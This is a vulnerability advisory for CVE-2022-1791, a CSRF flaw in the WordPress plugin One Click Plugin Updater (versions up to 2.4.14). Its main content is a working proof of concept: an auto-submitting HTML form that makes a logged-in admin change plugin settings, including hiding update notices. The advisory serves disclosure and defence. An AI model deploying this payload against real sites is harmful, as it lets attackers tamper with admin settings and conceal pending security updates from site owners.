One Click Plugin Updater <= 2.4.14 – Arbitrary Settings Update via CSRF | CVE 2022-1791

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and disable / hide the badge of the available updates and the related check.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/plugins.php?page=plugin_upgrade_options" method="POST">
    <input type="text" name="action" value="update">
    <input type="text" name="updater_module" value="updater_plugin">
    <input type="text" name="enable_plugin_checks" value="on">
    <input type="text" name="plugin_check_interval" value="43200">
    <input type="text" name="global_notices" value="on">
    <input type="text" name="mark_plugins_with_notifications" value="on">
    <input type="text" name="hide_notifications_for_inactive" value="on">
    <input type="text" name="hide_update_count_blurb" value="on">
    <input type="text" name="enable_wordpress_checks" value="on">
    <input type="text" name="wordpress_check_interval" value="43200">
    <input type="text" name="new_file_permissions" value="755">
    <input type="text" name="Submit" value="Save Changes">
</form>
<script>
    document.getElementById("test").submit();
</script>